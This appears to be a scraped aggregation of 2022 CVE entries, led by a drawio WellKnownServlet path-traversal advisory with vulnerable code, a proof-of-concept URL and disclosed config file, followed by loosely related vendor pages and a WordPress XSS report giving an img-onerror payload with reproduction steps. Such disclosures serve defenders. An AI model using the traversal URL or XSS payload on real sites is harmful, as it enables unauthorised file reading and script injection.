Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.

**Description**

The WellKnownServlet is vulnerable to path traversal. This allows reading local files. For example the files in WEB-INF that contain secrets and API keys can be read.

https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66

            String uri = request.getRequestURI().replace("/.", "/");
    
            if (uri.toLowerCase().contains(".json"))
            {
                response.setContentType("application/json");
            }
    
            // Serve whatever was requested from .well-known
            try (InputStream in = getServletContext().getResourceAsStream(uri))
            {
                if (in == null)
                {
                    response.sendError(404);
                    return;
                }
                
                byte[] buffer = new byte[8192];
                int count;
    
                while ((count = in.read(buffer)) > 0)
                {
                    response.getOutputStream().write(buffer, 0, count);
                }
                
                response.getOutputStream().flush();
                response.getOutputStream().close();
            }
    

**Proof of Concept**

Access the following URL (replace <host> with the actual host of the web application).

    <host>/.well-known/.../WEB-INF/appengine-web.xml
    

This will disclose the contents of appengine-web.xml:

    <?xml version="1.0" encoding="utf-8"?>
    <appengine-web-app xmlns="http://appengine.google.com/ns/1.0">
    
      <threadsafe>true</threadsafe>
      <sessions-enabled>false</sessions-enabled>
      <runtime>java8</runtime>
    
      
      <system-properties>
        <property name="java.util.logging.config.file" value="WEB-INF/logging.properties"/>
      </system-properties>
    
      
      <static-files>
        <include path="/**">
          <http-header name="Referrer-Policy" value="strict-origin"/>
          <http-header name="Access-Control-Allow-Origin" value="*"/>
          <http-header name="X-XSS-Protection" value="1; mode=block"/>
          <http-header name="X-Content-Type-Options" value="nosniff"/>
        </include>
      </static-files>
    
      
      <class-loader-config>
        <priority-specifier filename="cache-api-1.1.1.jar"/>
      </class-loader-config>
      
      <instance-class>F1</instance-class>
      <automatic-scaling>
        <max-idle-instances>1</max-idle-instances>
      </automatic-scaling>
    </appengine-web-app>
    

**Impact**

Read local files of the web application.

**Occurrences**

CVE-2022-1721: Path Traversal in WellKnownServlet in drawio

The th23 Social WordPress plugin through 1.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

CVE-2022-1062

Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter.

H-Sphere

Stable release

3.6.2 / May 15, 2013

Written in

Java

Operating system

Linux, FreeBSD, Windows

Type

Web hosting control panel

License

proprietary

Website

http://www.parallels.com/products/hsphere/

**H-Sphere** is a web hosting Automation Control Panel for shared web hosting services that was developed by Positive Software and acquired by Parallels, Inc. in September 2007.\[1\] It is available for Linux, Unix, and Windows environments, and works with MySQL, PostgreSQL, and Microsoft SQL Server databases. H-Sphere has been written in Java and works with any SQL-compliant database.

**Features\[edit\]**

*   Built-in billing system with variety of payment methods
*   Various hosting solutions (\*nix and Windows, database, load balancing, RealMedia, MS Exchange, SharePoint, FreeVPS, etc.)
*   Electronic mail system with antivirus and antispam filtering and integrated WebMail
*   Around 30 Payment gateways and 6 E-Payment Providers supported
*   Integrated support center
*   Multiple user tools
*   Integrated PHP/MySQL applications, both built-in and by means of add-ons\[2\]

**Advantages\[edit\]**

*   **Scalable multiserver cluster**: different physical and logical servers (web, mail, DNS etc.) are managed from one control panel. More servers can be added on the fly.
*   **Multilingual support** includes English, German, Dutch, French, Italian, Spanish, Russian, Portuguese (Brazil), and several other languages integrated by means of add-ons.
*   H-Sphere is recognized for **end-user features** availability, such as mail system, site building tools, SSL, etc. "Beginning webmasters may find H-Sphere too complicated for their needs. More advanced users, however, appreciate the features and control that H-Sphere offers the end user."
*   H-Sphere may give place to other panels as regards its ease of use, but not its **online documentation**.
*   H-Sphere has enlisted a community of **online supporters** who name it among their favorite control panels.\[3\]
*   Integrated Backup capability with the ClusterLogics system created by Cartika

**Disadvantages\[edit\]**

*   Licenses for H-Sphere accounts are more expensive than those of its competitors. Though, it is noted that H-Sphere licenses are reusable and sold for a cluster, not for a server, as with Ensim Pro.
*   Some customers state H-Sphere has too many advanced features and thus is a too complicated solution for small hosting companies, especially as a single server installation. While others note that H-Sphere advantages are more demonstrable on multi-server clusters.
*   On a single server mode H-Sphere consumes more server resources than other major single server control panels.\[4\]
*   H-Sphere control panel interface extensively uses JavaScript. Some reviewers regard it as a disadvantage.\[5\]
*   H-Sphere control panel by default works on non-standard 8080 and 8443 ports that may be blocked by client-side firewalls; but this can easily be changed in the configuration.
*   H-Sphere (like cPanel, but unlike Plesk) provides online file source editing, however with H-Sphere only allows editing of .txt or .html files and without line numbers in edit mode, thus limiting PHP and other script editing possibilities.

**other webhosting control panel software\[edit\]**

*   Baifox
*   cPanel
*   DirectAdmin
*   Hosting Controller
*   ispCP
*   ISPConfig
*   Kloxo
*   Plesk
*   SysCP
*   Webmin

**See also\[edit\]**

*   Parallels, the maintainers of H-Sphere
*   Web hosting control panel
*   Comparison of web hosting control panels

**References\[edit\]**

1.  **^** "Parallels Newsroom". 28 February 2020.
2.  **^** "Archived copy". Archived from the original on 2007-01-17. Retrieved 2007-05-24.{{cite web}}: CS1 maint: archived copy as title (link) CS1 maint: bot: original URL status unknown (link) 24/7 Solutions.
3.  **^** h-sphere control panels on WHTop.com
4.  **^** Post here, your favorite Control Panel. WebHostingTalk Forums.
5.  **^** "Hosting Obzor". Archived from the original on 2007-06-09. Retrieved 2007-05-24.

**External links\[edit\]**

CVE-2022-30777: H-Sphere

atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter.

CVE-2022-30776

A stored cross-site scripting (XSS) vulnerability in the upload function of totaljs CMS 3.4.5 allows attackers to execute arbitrary web scripts via a JavaScript embedded PDF file.

CVE-2022-30013

WordPress WP Event Manager plugin version 3.1.27 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin WP Event Manager  - Stored Cross SiteScripting# Date: 15-05-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/wp-event-manager/# Version: 3.1.27# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Steps To Reproduce :1 - First Install the plugins - wp-event-manager and activate it.2 - Go to event manager —> Add New3 - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.4 - Check the newly made event’s URL /event/{id}/ , XSS will trigger.#Poc Image :https://imgur.com/J1Q3x5u

WordPress WP Event Manager 3.1.27 Cross Site Scripting

Terminalfour before 8.3.8 allows XSS, aka RDSM-31817. 8.2.18.2.1 and 8.2.18.5 are also fixed versions.

**General****Workflows**

We received feedback about Workflow issues with multi-lingual Content Items, errors around rejection steps, and email functionality taking longer than it should. This release has over 20 fixes in place around the workflow functionality which should hopefully make things run smoother there.

**A couple of highlights:**

**RDSM-29134**

Approving Content Items in a Section Workflow configured to notify step moderators could be very slow. We've improved this by changing how those emails are queued and sent.

**RDSM-31244**

Previously if you modified and saved a Content Item where the reject settings were set to "Do nothing" and it had been already rejected in a Workflow, the Content Item did not re-enter or show up in the Workflow. That's fixed up now.

**RDSM-31306**

There were problems with rejecting independent Media Items that entered a Workflow. This has been resolved now.

**Performance**

**Moving mirrored sections - RDSM-25970**

As always we're still finding performance gains with each release. For this release our performance piece was around the time it takes to move a Mirrored Section. At a large scale (e.g. over 7000 Child Sections) this was very slow. With this update, the same action takes about 30% of the previous time, a welcome improvement.

**Fixes of note**

**Accessibility and anchor tags - RDSM-31347**

We made some adjustments to the meta\_anchor T4 Tag with this release. Previously that tag would output an <a> tag like this:

    <a id="d.en.10743"></a>

From an accessibility perspective, this isn't great –  it's not a link and it's not going anywhere – so we changed it from an <a> tag to a <span>. The linking functionality will work the same but the markup is better.

**Duplicating/mirroring/moving content to a Section, content ordering is lost - RDSM-28606**

As part of this release, we took a look at what is happening with ordering when content is mirrored/moved/duplicated. There were a few idiosyncrasies that we have ironed out now. For a view on the expected functionality see the new documentation.

**Translating a List into another language - RDSM-26130**

When you tried to translate a List you could end up on a blank screen. We had a workaround but it wasn't user-friendly, so we've fixed the problem and you should be able to translate lists again.

**Group names over 40 characters - RDSM-32481**

Up until now, Group names had to be under 40 characters. Now that's configurable from the database if it needs to be longer. 

**Content Syncer and extended user content type - RDSM-32242** 

We spotted a problem where the Content Syncer functionality was being blocked if the system had an extended user Content Type set. That's been fixed up now.

**Inactive Content Items that are made pending publish - RDSM-14098**

This is an issue that's worth keeping an eye out for as it's been around for a while and may change current publish behavior on some older pages (albeit incorrect behavior). In this scenario, we've seen that content that was made inactive, then updated to be pending (not approved) could be published. We've put a fix in so in this situation only approved content will be published.

CVE-2022-30770: Terminalfour 8.3.8 Release Notes

Calibre-Web before 0.6.18 allows user table SQL Injection.

**Security Policy****Reporting a Vulnerability**

Please report security issues to ozzie.fernandez.isaacs@googlemail.com

**Supported Versions**

To receive fixes for security vulnerabilities it is required to always upgrade to the latest version of Calibre-Web. See https://github.com/janeczku/calibre-web/releases/latest for the latest release.

**History**

Fixed in

Description

CVE number

3rd July 2018

Guest access acts as a backdoor

V 0.6.7

Hardcoded secret key for sessions

CVE-2020-12627

V 0.6.13

Calibre-Web Metadata cross site scripting

CVE-2021-25964

V 0.6.13

Name of Shelves are only visible to users who can access the corresponding shelf Thanks to @ibarrionuevo

V 0.6.13

JavaScript could get executed in the description field. Thanks to @ranjit-git and Hagai Wechsler (WhiteSource)

V 0.6.13

JavaScript could get executed in a custom column of type "comment" field

V 0.6.13

JavaScript could get executed after converting a book to another format with a title containing javascript code

V 0.6.13

JavaScript could get executed after converting a book to another format with a username containing javascript code

V 0.6.13

JavaScript could get executed in the description series, categories or publishers title

V 0.6.13

JavaScript could get executed in the shelf title

V 0.6.13

Login with the old session cookie after logout. Thanks to @ibarrionuevo

V 0.6.14

CSRF was possible. Thanks to @mik317 and Hagai Wechsler (WhiteSource)

CVE-2021-25965

V 0.6.14

Migrated some routes to POST-requests (CSRF protection). Thanks to @scara31

CVE-2021-4164

V 0.6.15

Fix for "javascript:" script links in identifier. Thanks to @scara31

CVE-2021-4170

V 0.6.15

Cross-Site Scripting vulnerability on uploaded cover file names. Thanks to @ibarrionuevo

V 0.6.15

Creating public shelfs is now denied if user is missing the edit public shelf right. Thanks to @ibarrionuevo

V 0.6.15

Changed error message in case of trying to delete a shelf unauthorized. Thanks to @ibarrionuevo

V 0.6.16

JavaScript could get executed on authors page. Thanks to @alicaz

CVE-2022-0352

V 0.6.16

Localhost can no longer be used to upload covers. Thanks to @scara31

CVE-2022-0339

V 0.6.16

Another case where public shelfs could be created without permission is prevented. Thanks to @nhiephon

CVE-2022-0273

V 0.6.16

It's prevented to get the name of a private shelfs. Thanks to @nhiephon

CVE-2022-0405

V 0.6.17

The SSRF Protection can no longer be bypassed via an HTTP redirect. Thanks to @416e6e61

CVE-2022-0767

V 0.6.17

The SSRF Protection can no longer be bypassed via 0.0.0.0 and it's ipv6 equivalent. Thanks to @r0hanSH

CVE-2022-0766

V 0.6.18

Possible SQL Injection is prevented in user table Thanks to Iman Sharafaldin (Forward Security)

CVE-2022-30765

V 0.6.18

The SSRF protection no longer can be bypassed by IPV6/IPV4 embedding. Thanks to @416e6e61

CVE-2022-0939

V 0.6.18

The SSRF protection no longer can be bypassed to connect to other servers in the local network. Thanks to @michaellrowley

CVE-2022-0990

**Statement regarding Log4j (CVE-2021-44228 and related)**

Calibre-web is not affected by bugs related to Log4j. Calibre-Web is a python program, therefore not using Java, and not using the Java logging feature log4j.

CVE-2022-30765: calibre-web/SECURITY.md at master · janeczku/calibre-web

Webmin through 1.991, when the Authentic theme is used, allows remote code execution when a user has been manually created (i.e., not created in Virtualmin or Cloudmin). This occurs because settings-editor_write.cgi does not properly restrict the file parameter.

CVE-2022-30708: Webmin

Authenticated (contributor or higher role) Cross-Site Scripting (XSS) vulnerability in Donations plugin <= 1.8 on WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of February 28, 2022 and is not available for download. Reason: Security Issue.

There is no way to edit the 'insert custom value' in the form page. it gets confusing for site visitor as an 'insert amount' would be certainly clearer. All in all, a very good plugin

Failed FAQ, no any reply to the question u asked

Hello this is great. LARGE DAMAGE: PAYMENT "STRIPE" NOT CONSIDERED. ONLY PAYPAL

Read all 8 reviews

“Donations” is open source software. The following people have contributed to this plugin.

Contributors

*    nicdark

Tag

#xss